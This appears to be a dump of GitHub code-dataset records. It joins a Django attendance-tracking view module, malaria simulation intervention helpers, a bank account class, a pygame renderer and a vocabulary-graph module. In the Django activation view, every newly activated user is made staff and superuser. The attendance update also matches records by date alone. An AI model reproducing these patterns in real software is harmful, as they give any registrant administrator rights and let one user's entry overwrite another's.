gyomuselect4,\n 'abs': abs,\n 'holidaykbn': hol,\n 'riyu' : riyu,\n 'chikoku' : todo0,\n 'hayade' : todo1,\n 'soutai' : todo2,\n 'hensoku' : todo3,\n 'midnight': todo4,\n 'holiday' : todo5,\n 'ymd': timestr,\n 'user' : ida,\n })\n return render(request, 'registration/kintai.html', context)\n\n\n \n #DB格納(出勤)\n b = kintai_touroku_info(syaincd=ida,syainname = name, \n ymd=timestr,starttime=start,endtime=end,worktime=worktime,overtime=over,\n resttime=resttime, attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n todoke_tikoku=todo0db, todoke_soutai=todo1db, todoke_midnight=todo2db, todoke_hayade=todo3db, \n todoke_irregular=todo4db, todoke_holiwork=todo5db, todokekbn=todok,mntime = midtime,mnovertime = midover,\n paidtime = paidtime,\n projectname1 = t1,kouteiname1 = koutei1, workname1 = gyomuselect1, start1 = starttime1, end1 = endtime1, rest1 = resttime1,\n projectname2 = t2,kouteiname2 = koutei2, workname2 = gyomuselect2, start2 = starttime2, end2 = endtime2, rest2 = resttime2,\n projectname3 = t3,kouteiname3 = koutei3, workname3 = gyomuselect3, start3 = starttime3, end3 = endtime3, rest3 = resttime3,\n projectname4 = t4,kouteiname4 = koutei4, workname4 = gyomuselect4, start4 = starttime4, end4 = endtime4, rest4 = resttime4,\n projectcd1 = projectcd1,projectcd2 = projectcd2,projectcd3 = projectcd3,projectcd4 = projectcd4,\n kouteicd1 = kouteicd1,kouteicd2 = kouteicd2,kouteicd3 = kouteicd3,kouteicd4 = kouteicd4,\n workcd1 = workcd1,workcd2 = workcd2,workcd3 = workcd3,workcd4 = workcd4)\n #DB格納(欠勤)\n else:\n start = '00:00'\n end = '00:00'\n worktime= 0.0\n over = 0.0\n b = kintai_touroku_info(syaincd=ida,syainname = name, \n ymd=timestr, starttime=start,endtime=end,worktime=worktime,overtime=over,attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n start1 = starttime1, end1 = endtime1,\n start2 = starttime2, end2 = endtime2,\n start3 = starttime3, end3 = endtime3,\n start4 = starttime4, end4 = endtime4,\n todokekbn=todok)\n\n listf = kintai_touroku_info.objects.filter(ymd = timestr)\n \n \n if (len(listf) == 0):\n b.save()\n else:\n b = kintai_touroku_info.objects.filter(ymd = timestr)\n b.update(starttime=start,endtime=end,worktime=worktime,overtime=over,\n resttime=resttime,attkbn=absdb, holidaykbn=holdb, holidayriyu=riyu,\n todoke_tikoku=todo0db, todoke_soutai=todo1db, todoke_midnight=todo2db, todoke_hayade=todo3db, \n 
todoke_irregular=todo4db, todoke_holiwork=todo5db, todokekbn=todok,\n projectname1 = t1,kouteiname1 = koutei1, workname1 = gyomuselect1, start1 = starttime1, end1 = endtime1, rest1 = resttime1,\n projectname2 = t2,kouteiname2 = koutei2, workname2 = gyomuselect2, start2 = starttime2, end2 = endtime2, rest2 = resttime2,\n projectname3 = t3,kouteiname3 = koutei3, workname3 = gyomuselect3, start3 = starttime3, end3 = endtime3, rest3 = resttime3,\n projectname4 = t4,kouteiname4 = koutei4, workname4 = gyomuselect4, start4 = starttime4, end4 = endtime4, rest4 = resttime4,\n projectcd1 = projectcd1,projectcd2 = projectcd2,projectcd3 = projectcd3,projectcd4 = projectcd4,\n kouteicd1 = kouteicd1,kouteicd2 = kouteicd2,kouteicd3 = kouteicd3,kouteicd4 = kouteicd4,\n workcd1 = workcd1,workcd2 = workcd2,workcd3 = workcd3,workcd4 = workcd4)\n \n context = {\n 'message': '勤怠登録しました',\n 'starttime':start, 'endtime': end,'worktime': worktime,'overtime': over,'resttime': resttime,\n 'ymd': timestr,'projectname1': t1,'projectname2': t2,'projectname3': t3,'projectname4': t4,\n 'starttime1': request.POST.get('starttime1',''),'starttime2': request.POST.get('starttime2',''),\n 'starttime3': request.POST.get('starttime3',''),'starttime4': request.POST.get('starttime4',''),\n 'endtime1': request.POST.get('endtime1',''),'endtime2': request.POST.get('endtime2',''),\n 'endtime3': request.POST.get('endtime3',''),'endtime4': request.POST.get('endtime4',''),\n 'resttime1': request.POST.get('resttime1',''), 'resttime2': request.POST.get('resttime2',''),\n 'resttime3': request.POST.get('resttime3',''), 'resttime4': request.POST.get('resttime4',''),\n 'koutei1': value1,'koutei2': value2, 'koutei3': value3,'koutei4': value4,\n 'kouteiselect1': koutei1,'kouteiselect2': koutei2, 'kouteiselect3': koutei3, 'kouteiselect4': koutei4,\n 'gyomu1': gyomu1,'gyomu2': gyomu2,'gyomu3': gyomu3, 'gyomu4': gyomu4,\n 'gyomuselect1': gyomuselect1,'gyomuselect2': gyomuselect2,'gyomuselect3': gyomuselect3,'gyomuselect4': gyomuselect4,\n 'abs': abs, 'holidaykbn': hol, 'riyu' : riyu,\n 'chikoku' : todo0,'hayade' : todo1,'soutai' : todo2,'hensoku' : todo3,'midnight': todo4, 'holiday' : todo5,\n 'user' : ida,\n\n }\n return render(request, 'registration/kintai.html', context)\n\n\n#勤怠入力画面ロード \ndef kintaiload(request):\n template = loader.get_template('registration/kintai.html')\n id = request.session.get('User','')\n nowyear = str(datetime.date.today().year)\n nowmonth = str(format(datetime.date.today().month,'02'))\n nowday = str(format(datetime.date.today().day,'02'))\n nowdate = nowyear + \"-\" + nowmonth + \"-\" + nowday\n monthyear = request.POST.get('dateselect',nowdate)\n\n listf = kintai_touroku_info.objects.filter(ymd = monthyear, syaincd = id)\n if (len(listf) == 1):\n\n attkbn = listf[0].attkbn\n holidaykbn = listf[0].holidaykbn\n holidayriyu = listf[0].holidayriyu\n start = str(listf[0].starttime)\n start = start[:5]\n end = str(listf[0].endtime)\n end = end[:5]\n start1 = str(listf[0].start1)\n start1 = start1[:5]\n end1 = str(listf[0].end1)\n end1 = end1[:5]\n start2 = str(listf[0].start2)\n start2 = start2[:5]\n end2 = str(listf[0].end2)\n end2 = end2[:5]\n start3 = str(listf[0].start3)\n start3 = start3[:5]\n end3 = str(listf[0].end3)\n end3 = end3[:5]\n start4 = str(listf[0].start4)\n start4 = start4[:5]\n end4 = str(listf[0].end4)\n end4 = end4[:5]\n todo0 = listf[0].todoke_tikoku\n todo1 = listf[0].todoke_soutai\n todo2 = listf[0].todoke_midnight\n todo3 = listf[0].todoke_hayade\n todo4 = listf[0].todoke_irregular\n todo5 = 
listf[0].todoke_holiwork\n koutei1 = project_work.objects.filter(projectname=listf[0].projectname1).distinct('kouteiname')\n koutei2 = project_work.objects.filter(projectname=listf[0].projectname2).distinct('kouteiname')\n koutei3 = project_work.objects.filter(projectname=listf[0].projectname3).distinct('kouteiname')\n koutei4 = project_work.objects.filter(projectname=listf[0].projectname4).distinct('kouteiname')\n gyomu1 = project_work.objects.filter(projectname=listf[0].projectname1,kouteiname=listf[0].kouteiname1)\n gyomu2 = project_work.objects.filter(projectname=listf[0].projectname2,kouteiname=listf[0].kouteiname2)\n gyomu3 = project_work.objects.filter(projectname=listf[0].projectname3,kouteiname=listf[0].kouteiname3)\n gyomu4 = project_work.objects.filter(projectname=listf[0].projectname4,kouteiname=listf[0].kouteiname4)\n \n if (attkbn == 0 ):\n attkbn = '出勤'\n if (attkbn == 1 ):\n attkbn = '欠勤'\n if (holidaykbn == 0 ):\n holidaykbn = '取得なし'\n if (holidaykbn == 1 ):\n holidaykbn = '有給休暇'\n if (holidaykbn == 2 ):\n holidaykbn = '特休・その他休暇'\n if (holidaykbn == 3 ):\n holidaykbn = '代休'\n if (holidaykbn == 4 ):\n holidaykbn = 'その他'\n if (holidaykbn == 5 ):\n holidaykbn = '半休等'\n if (todo0 == 1 ):\n todo0 = '遅刻'\n else:\n todo0 = ''\n if (todo1 == 1 ):\n todo1 = '早出有'\n else:\n todo1 = ''\n if (todo2 == 1 ):\n todo2 = '早退'\n else:\n todo2 = ''\n if (todo3 == 1 ):\n todo3 = '変則勤務'\n else:\n todo3 = ''\n if (todo4 == 1 ):\n todo4 = '深夜有'\n else:\n todo4 = ''\n if (todo5 == 1 ):\n todo5 = '休日出勤'\n else:\n todo5 = ''\n context = {\n 'starttime':start, 'endtime': end,\n 'worktime': listf[0].worktime,'overtime': listf[0].overtime,\n 'resttime': listf[0].resttime,'ymd': monthyear,\n 'projectname1':listf[0].projectname1, 'projectname2':listf[0].projectname2,\n 'projectname3':listf[0].projectname3, 'projectname4':listf[0].projectname4,\n 'koutei1': koutei1, 'koutei2': koutei2,'koutei3': koutei3,'koutei4': koutei4,\n 'kouteiselect1': listf[0].kouteiname1, 'kouteiselect2': listf[0].kouteiname2,'kouteiselect3': listf[0].kouteiname3, 'kouteiselect4': listf[0].kouteiname4,\n 'gyomu1': gyomu1,'gyomu2': gyomu2, 'gyomu3': gyomu3, 'gyomu4': gyomu4,\n 'gyomuselect1': listf[0].workname1, 'gyomuselect2': listf[0].workname2,\n 'gyomuselect3': listf[0].workname3, 'gyomuselect4': listf[0].workname4,\n 'starttime1':start1, 'endtime1': end1, 'resttime1': listf[0].rest1,\n 'starttime2':start2,'endtime2': end2, 'resttime2': listf[0].rest2,\n 'starttime3':start3,'endtime3': end3, 'resttime3': listf[0].rest3,\n 'starttime4':start4,'endtime4': end4, 'resttime4': listf[0].rest4,\n 'holidaykbn': holidaykbn, 'abs': attkbn, 'riyu': holidayriyu,\n 'chikoku': todo0, 'hayade': todo1,'soutai': todo2, 'hensoku': todo3, 'midnight': todo4, 'holiday': todo5,\n 'user' : id,\n } \n return render(request, 'registration/kintai.html', context)\n context = {\n 'ymd': monthyear,\n 'user' : id,\n } \n return render(request, 'registration/kintai.html', context)\n \n \n\n\nclass UserCreate(generic.CreateView):\n \"\"\"ユーザ登録\"\"\"\n template_name = 'customLogin/user_create.html'\n form_class = CustomUserCreateForm\n\n def get(self, request, **kwargs):\n if request.user.is_authenticated:\n return HttpResponseRedirect('/')\n return super().get(request, **kwargs)\n\n def form_valid(self, form):\n # 仮登録\n user = form.save(commit=False)\n user.is_active = False\n user.save()\n\n # メール送信\n current_site = get_current_site(self.request)\n domain = current_site.domain\n context = {\n 'protocol': 'https' if self.request.is_secure() else 'http',\n 
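# ---- Aside (re: the activation flow around this point): form_valid signs the
# user's pk with django.core.signing.dumps and emails it; UserCreateComplete below
# recovers it with loads(token, max_age=...), treating SignatureExpired and
# BadSignature as bad requests. The round-trip in isolation, assuming a configured
# SECRET_KEY:
from django.core.signing import BadSignature, SignatureExpired, dumps, loads

def make_activation_token(user_pk):
    return dumps(user_pk)  # signed and timestamped payload

def read_activation_token(token, max_age=60 * 60 * 24):
    try:
        return loads(token, max_age=max_age)  # raises if tampered with or expired
    except (BadSignature, SignatureExpired):
        return None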
'domain': domain,\n            'token': dumps(user.pk),\n            'user': user\n        }\n        subject_template = get_template('customLogin/mail/subject.txt')\n        message_template = get_template('customLogin/mail/message.txt')\n        subject = subject_template.render(context)\n        message = message_template.render(context)\n        user.email_user(subject, message)\n        return redirect('customLogin:user_create_done')\n\n\nclass UserCreateComplete(generic.TemplateView):\n    \"\"\"Full registration complete.\"\"\"\n    template_name = 'customLogin/user_create_complete.html'\n    timeout_seconds = getattr(settings, 'ACTIVATION_TIMEOUT_SECONDS', 60 * 60 * 24)  # default: within one day\n\n    def get(self, request, **kwargs):\n        \"\"\"Activate the account if the token is valid.\"\"\"\n        if request.user.is_authenticated:\n            return HttpResponseRedirect('/')\n\n        token = kwargs.get('token')\n        try:\n            user_pk = loads(token, max_age=self.timeout_seconds)\n\n        # token expired\n        except SignatureExpired:\n            return HttpResponseBadRequest()\n\n        # token is invalid\n        except BadSignature:\n            return HttpResponseBadRequest()\n\n        # token is fine\n        try:\n            user = User.objects.get(pk=user_pk)\n        except User.DoesNotExist:\n            return HttpResponseBadRequest()\n\n        if not user.is_active:\n            # no problems found: complete the registration\n            user.is_active = True\n            user.is_staff = True\n            user.is_superuser = True\n            user.save()\n\n            # generate the QR code\n            request.session[\"img\"] = utils.get_image_b64(utils.get_auth_url(user.email, utils.get_secret(user)))\n\n            return super().get(request, **kwargs)\n\n        return HttpResponseBadRequest()\n\n\nclass CustomLoginView(LoginView):\n    \"\"\"Login.\"\"\"\n    form_class = CustomLoginForm\n    template_name = 'customLogin/user_login.html'\n\n    def get(self, request, **kwargs):\n        if request.user.is_authenticated:\n            return HttpResponseRedirect('/')\n        return super().get(request, **kwargs)\n\n\nclass UserCreateDone(generic.TemplateView):\n    \"\"\"Provisional registration complete.\"\"\"\n\n    def get(self, request, **kwargs):\n        if request.user.is_authenticated:\n            return HttpResponseRedirect('/')\n        return super().get(request, **kwargs)\n","repo_name":"fosnetkintaigroup/src","sub_path":"venv/mysite/app_config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":63705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}\n+{"seq_id":"2581029420","text":"import os\nimport copy\nimport pandas as pd\nimport sys\nsys.path.append('../helpers/')\nfrom load_paths import load_box_paths\nfrom malaria.interventions.health_seeking import add_health_seeking\nfrom malaria.interventions.malaria_diagnostic import add_diagnostic_survey\nfrom malaria.interventions.malaria_drug_campaigns import add_drug_campaign\nfrom malaria.interventions.adherent_drug import configure_adherent_drug\nfrom dtk.interventions.migrate_to import add_migration_event\n\ndatapath, projectpath = load_box_paths()\n\n# Study MTTT Interventions\n\ndef add_MTTT(cb, start=244, interval=90, rounds=4, coverage=1, tracking_only=False):\n    cb.update_params({'Report_Event_Recorder': 1,\n                      'Report_Event_Recorder_Ignore_Events_In_List': 0,\n                      'Report_Event_Recorder_Events': ['RDT_Positive_DT1',\n                                                       'RDT_Positive_DT2'],\n                      'Report_Event_Recorder_Individual_Properties': ['Ledger'],\n                      'Custom_Individual_Events': ['MTTT_Done',\n                                                   'RDT_Positive_MTTT',\n                                                   'Received_MTTT_Drugs',\n                                                   'DT1_Done', 'RDT_Positive_DT1',\n                                                   'DT2_Done', 'RDT_Positive_DT2']})\n    DT1 = 0.09\n    DT2 = 0.1\n    Sens1 = 0.5\n    Sens2 = 0.87\n    Spec1 = 0.95\n    Spec2 = 0.95\n    if tracking_only:\n        pass\n    else:\n        # Hard-coded (for now) loop through 10 start_days\n        for d in range(10):\n            # Quarterly RDT on assigned start day\n            # Node 1 - Nxtek\n            
add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT1,\n sensitivity= Sens1, specificity=Spec1,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[1],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Node 2- SDBioline\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT2,\n sensitivity=Sens2, specificity=Spec2,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[2],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Drugs given if RDT positive\n #adherent_drug_configs= mttt_adherence_configuration(cb,adherence)\n add_drug_campaign(cb=cb, campaign_type=\"MDA\", drug_code=\"AL\", start_days=[1],\n coverage=coverage, trigger_condition_list=[\"RDT_Positive_MTTT\"],\n receiving_drugs_event_name=\"Received_MTTT_Drugs\",\n nodeIDs=[1, 2], target_residents_only=0)\n\n # Other 'Listening' RDTs to track RDT prevalence throughout study period (not just during MTTT rounds)\n # Should NOT trigger any intervention / drug campaign\n\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT1, sensitivity=Sens1, specificity=Spec1,\n event_name=\"DT1\", received_test_event=\"DT1_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT1'}])\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PF_HRP2\", diagnostic_threshold=DT2, sensitivity=Sens2, specificity=Spec2,\n event_name=\"DT2\", received_test_event=\"DT2_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT2'}])\n\n return {\n 'MTTT_Coverage': coverage\n }\n\ndef add_MTTT_2(cb, start=244, interval=90, rounds=4, coverage=1, tracking_only=False):\n cb.update_params({'Report_Event_Recorder': 1,\n 'Report_Event_Recorder_Ignore_Events_In_List': 0,\n 'Report_Event_Recorder_Events': ['RDT_Positive_DT1',\n 'RDT_Positive_DT2'],\n 'Report_Event_Recorder_Individual_Properties': ['Ledger'],\n 'Custom_Individual_Events': ['MTTT_Done',\n 'RDT_Positive_MTTT',\n 'Received_MTTT_Drugs',\n 'DT1_Done', 'RDT_Positive_DT1',\n 'DT2_Done', 'RDT_Positive_DT2']})\n DT1 = 3.2 # (default PCR detection threshold, from malaria/symptoms.py which should match insetChart reported PCR_Parasite_Prevalence used for Calibration)\n DT2 = 3.2\n Sens1 = 0.742 # Values from Linda's paper\n Sens2 = 0.755\n Spec1 = 0.846\n Spec2 = 0.861\n if tracking_only == True:\n pass\n else:\n # Hard-coded (for now) loop through 10 start_days\n for d in range(10):\n # Quarterly RDT on assigned start day\n # Node 1 - Nxtek\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT1,\n sensitivity= Sens1, specificity=Spec1,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[1],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Node 2- 
SDBioline\n add_diagnostic_survey(cb=cb, start_day=start + d + 1,\n repetitions=rounds, tsteps_btwn_repetitions=interval,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT2,\n sensitivity=Sens2, specificity=Spec2,\n event_name=\"MTTT\", received_test_event=\"MTTT_Done\",\n nodeIDs=[2],\n IP_restrictions=[{\"DOW\": str(d)}],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_MTTT'}])\n # Drugs given if RDT positive\n #adherent_drug_configs= mttt_adherence_configuration(cb,adherence)\n add_drug_campaign(cb=cb, campaign_type=\"MDA\", drug_code=\"AL\", start_days=[1],\n coverage=coverage, trigger_condition_list=[\"RDT_Positive_MTTT\"],\n receiving_drugs_event_name=\"Received_MTTT_Drugs\",\n nodeIDs=[1, 2], target_residents_only=0)\n\n # Other 'Listening' RDTs to track RDT prevalence throughout study period (not just during MTTT rounds)\n # Should NOT trigger any intervention / drug campaign\n\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT1, sensitivity=Sens1, specificity=Spec1,\n event_name=\"DT1\", received_test_event=\"DT1_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT1'}])\n add_diagnostic_survey(cb=cb, start_day=250, repetitions=400, tsteps_btwn_repetitions=5,\n diagnostic_type=\"PCR_PARASITES\", diagnostic_threshold=DT2, sensitivity=Sens2, specificity=Spec2,\n event_name=\"DT2\", received_test_event=\"DT2_Done\",\n nodeIDs=[1, 2],\n positive_diagnosis_configs=[{\"class\": \"BroadcastEvent\",\n \"Broadcast_Event\": 'RDT_Positive_DT2'}])\n\n return {\n 'MTTT_Coverage': coverage\n }\n\n\n\n\n\ndef smc_adherent_configuration(cb, adherence):\n smc_adherent_config = configure_adherent_drug(cb,\n doses=[[\"Sulfadoxine\", \"Pyrimethamine\",'Amodiaquine'],\n ['Amodiaquine'],\n ['Amodiaquine']],\n dose_interval=1,\n non_adherence_options=['Stop'],\n non_adherence_distribution=[1],\n adherence_config={\n \"class\": \"WaningEffectMapCount\",\n \"Initial_Effect\": 1,\n \"Durability_Map\": {\n \"Times\": [\n 1.0,\n 2.0,\n 3.0\n ],\n \"Values\": [\n 1,\n adherence,\n adherence\n ]\n }\n }\n )\n return smc_adherent_config\n\n\n\ndef health_seeking(cb, kid_coverage, adult_scalar=0.6, start_day=0, nodeIDs=None) :\n\n school_age_scalar = 1 - ((1 - adult_scalar)*0.5)\n coverage_dict = [\n {'agemin' : 0,\n 'agemax' : 5,\n 'trigger' : 'NewClinicalCase',\n 'coverage' : kid_coverage,\n 'seek' : 1,\n 'rate' : 0.3},\n {'agemin': 5,\n 'agemax': 15,\n 'trigger': 'NewClinicalCase',\n 'coverage': kid_coverage*school_age_scalar,\n 'seek': 1,\n 'rate': 0.3},\n {'agemin': 15,\n 'agemax': 120,\n 'trigger': 'NewClinicalCase',\n 'coverage': kid_coverage*adult_scalar,\n 'seek': 1,\n 'rate': 0.3},\n {'agemin': 0,\n 'agemax': 120,\n 'trigger': 'NewSevereCase',\n 'coverage': max([0.8, kid_coverage]),\n 'seek': 1,\n 'rate': 0.2},\n ]\n\n add_health_seeking(cb, start_day=start_day, targets=coverage_dict, drug=[\"Artemether\", \"Lumefantrine\"],\n nodeIDs=nodeIDs)\n return {\n 'child_coverage' : kid_coverage,\n 'adult_coverage' : kid_coverage*adult_scalar\n }\n\n\ndef add_health_seeking_from_df(cb, start_day, hs_df, adult_scalar=0.6) :\n\n for r, row in hs_df.iterrows() :\n health_seeking(cb, start_day=start_day, kid_coverage=row['child_coverage'],\n nodeIDs=[int(row['node'])], adult_scalar=adult_scalar)\n return {\n 'node_%d_hs' % row['node'] : row['child_coverage'] for r, row in 
hs_df.iterrows()\n }\n\n\ndef read_in_habitat_from_baseline_calib(habs_to_run_fname, numsamples) :\n\n adf = pd.read_csv(os.path.join(projectpath, 'simulation_output', 'baseline', habs_to_run_fname))\n df = pd.DataFrame()\n for node, ndf in adf.groupby('node') :\n sdf = copy.copy(ndf.sort_values(by='diff').head(numsamples))\n sdf = sdf.reset_index()\n sdf['rank'] = sdf.index\n df = pd.concat([df, sdf])\n df['NodeID'] = df['node']\n df['habitat_scale'] = df['x_Temporary_Larval_Habitat']\n\n return df\n\n\ndef add_special_migration(cb):\n # Set Is_Moving = False\n # Set Dont_Allow_Duplicates = False\n mig_events = pd.read_csv(os.path.join('%s' % projectpath, 'simulation_inputs', 'migration',\n 'migration_ledgers_events.csv'))\n for index, row in mig_events.iterrows():\n start = int(row[\"start_day\"])\n ledger = str(row[\"ledger\"])\n node_from = int(row[\"node_from\"])\n node_to = int(row[\"node_to\"])\n at_node = int(row[\"at_node\"])\n\n duration_at_node = {\"Duration_At_Node_Distribution\": \"CONSTANT_DISTRIBUTION\",\n \"Duration_At_Node_Constant\": at_node}\n duration_before_leaving = {\"Duration_Before_Leaving_Distribution\": \"UNIFORM_DISTRIBUTION\",\n \"Duration_Before_Leaving_Min\": 15,\n \"Duration_Before_Leaving_Max\": 112}\n\n add_migration_event(cb,\n start_day=start,\n nodesfrom=[node_from],\n nodeto=node_to,\n coverage=1.0,\n duration_at_node=duration_at_node,\n duration_before_leaving=duration_before_leaving,\n ind_property_restrictions=[{\"Ledger\": ledger}],\n repetitions=1)","repo_name":"laurettemhlanga/emodtrials","sub_path":"interventions.py","file_name":"interventions.py","file_ext":"py","file_size_in_byte":14539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31468396002","text":"from quinterac.Errors import *\n\n\nclass Account:\n\n def __init__(self, accountNumber, accountName, isNewAccount=None, balance=0):\n self.accountNumber = accountNumber\n self.accountName = accountName\n self.balance = int(balance)\n self.totalDeposited = 0\n self.totalWithdrawn = 0\n self.totalTransferred = 0\n self.isNewAccount = isNewAccount\n\n def deposit(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalDeposited + int(amount) <= DailyLimits.getDepositLimit(isAtm):\n self.totalDeposited += int(amount)\n self.updateBalance(int(amount))\n return True\n\n return Error.overDepositLimit\n\n def withdraw(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalWithdrawn + int(amount) <= DailyLimits.getWithdrawalLimit(isAtm):\n self.totalWithdrawn += int(amount)\n self.updateBalance(-int(amount))\n return True\n\n return Error.overWithdrawalLimit\n\n def transfer(self, amount, isAtm):\n if self.isNewAccount:\n return Error.newAccount\n\n if self.totalTransferred + int(amount) <= DailyLimits.getTransferLimit(isAtm):\n self.totalTransferred += int(amount)\n self.updateBalance(-int(amount))\n return True\n\n return Error.overTransferLimit\n\n def updateBalance(self, newValue):\n if (int(self.balance) + int(newValue)) < 0:\n return Error.negativeBalance\n\n self.balance += int(newValue)\n return None\n\n def __lt__(self, other):\n return self.accountNumber < other.accountNumber\n\n def __gt__(self, other):\n return self.accountNumber > other.accountNumber\n\nclass DailyLimits:\n accounts = []\n\n @staticmethod\n def 
loadAccounts(fileName):\n try:\n with open(fileName, 'r') as accountsFile:\n lines = accountsFile.readlines()\n for line in lines:\n line = line.strip()\n if line != \"0000000\":\n account = Account(line, \"\", False)\n DailyLimits.accounts.append(account)\n\n except FileNotFoundError:\n DailyLimits.accounts = []\n\n @staticmethod\n def addAccount(account):\n\n DailyLimits.accounts.append(account)\n\n @staticmethod\n def getDepositLimit(isAtm):\n return 500000 if isAtm else 99999999\n\n @staticmethod\n def getWithdrawalLimit(isAtm):\n return 500000 if isAtm else 99999999\n\n @staticmethod\n def getTransferLimit(isAtm):\n return 1000000 if isAtm else 99999999\n\n @staticmethod\n def getAccountFor(accountNumber):\n for account in DailyLimits.accounts:\n if account.accountNumber == accountNumber:\n return account\n\n return None\n","repo_name":"asaferrosenthal/bat-quinterac","sub_path":"quinterac/Account.py","file_name":"Account.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39752797107","text":"import pygame\r\n\r\nclass RenderClearBg(pygame.sprite.RenderPlain):\r\n def draw(self, surface):\r\n for s in self.spritedict.keys():\r\n if not s.bg_prepared:\r\n s.bg = pygame.Surface(s.rect.size)\r\n s.bg.blit (surface, (0,0), s.rect)\r\n s.bg_prepared = True\r\n \r\n if s.dirty:\r\n surface.blit (s.bg, s.old_pos)\r\n \r\n if s.bg.get_rect().size != s.rect.size: s.bg = pygame.Surface(s.rect.size)\r\n \r\n s.bg.blit (surface, (0,0), s.rect)\r\n surface.blit (s.image, s.rect.topleft)\r\n s.dirty = False\r\n #pygame.sprite.RenderClear.draw(self, surface)\r\n \r\n #def clear(self, surface):\r\n # for s, r in self.spritedict.items():\r\n # surface.blit (s.bg, s.rect.topleft)","repo_name":"xebecnan/our-gathering","sub_path":"src/client/renderclearbg.py","file_name":"renderclearbg.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34087692085","text":"\"\"\"\nGlobal vocab managing utilities.\n\nEssential question: what does CrooshToost know about for this session? The utilities in this module are for\nanswering the more specific question: what vocabulary is CrooshToost familiar with in this session. This includes\nmodel names, model layer names, model callbacks, model parameters, etc.\n\n\"Vocabulary\" in CrooshToost refers to anything that can be operated on/with corresponding to the current model.\nThis can include parameter names, attribute names, method names, method argument names, etc.\n\"\"\"\n\n# Idea\n# I think internally the vocabulary should be stored as a sort of graph of relations between\n# names and objects. For example, \"model.layers\" should be stored as an IS_ATTR_OF relation\n# connecting \"layers\" to \"model\" (directed). \"node_index\" should be stored as an IS_ARG_OF\n# relation connecting \"node_index\" to \"get_input_mask_at\", which is itself stored as an\n# IS_METHOD_OF relation connecting \"get_input_mask_at\" to \"model\".\n#\n# The types of relationships the graph maintains can then be used to search for likely objects\n# or commands matching noun-phrases and intent extracted from the user input. 
They will also\n# help to structure the execution of the command itself.\n\n# TODO: Figure out how \"possible\" it is to automatically monitor mutable objects for changes in\n# their __dict__.\n# Interesting Fact: most objects' __dict__'s are *not* readonly ;)\n\nfrom .vocab_graph import VocabGraph, WordRelations\nfrom ..globals import GLOBALS\n\nfrom platform import python_version\n\nimport inspect\nimport numpy as np\nimport tensorflow as tf\nimport types, typing\n\n# Compare numeric (major, minor) tuples: a plain string comparison would misorder\n# Python 3.10+ (e.g. '3.10' < '3.6' as strings).\nif tuple(int(v) for v in python_version().split('.')[:2]) < (3, 6):\n # Easiest examples I could find of each\n typing_MethodDescriptorType = None # Still not sure\n typing_MethodWrapperType = type(\"\".__repr__)\n typing_WrapperDescriptorType = type(str.__repr__)\nelse:\n typing_MethodDescriptorType = typing.MethodDescriptorType\n typing_MethodWrapperType = typing.MethodWrapperType\n typing_WrapperDescriptorType = typing.WrapperDescriptorType\n\n_DEFAULT_VOCAB = [\n # Default vocabulary to include.\n]\n\n# These are types to ignore exploring further. They don't have \"unusual\" attributes\n# that we wish to explore and add to our vocabulary.\n#\n# There are tons of other classes we could be checking here, but for now lets just assume\n# that anything beyond this list is considered \"interesting\".\n_BASE_TYPES = {\n bool, int, float, complex, str,\n np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64,\n np.float16, np.float32, np.float64, np.double,\n np.long, np.longcomplex, np.longdouble, np.longlong,\n bytes, bytearray, memoryview, type, property,\n list, tuple, range, dict, set, frozenset,\n type(...), type(NotImplemented), # type(None), Not too sure about type(None) yet...\n 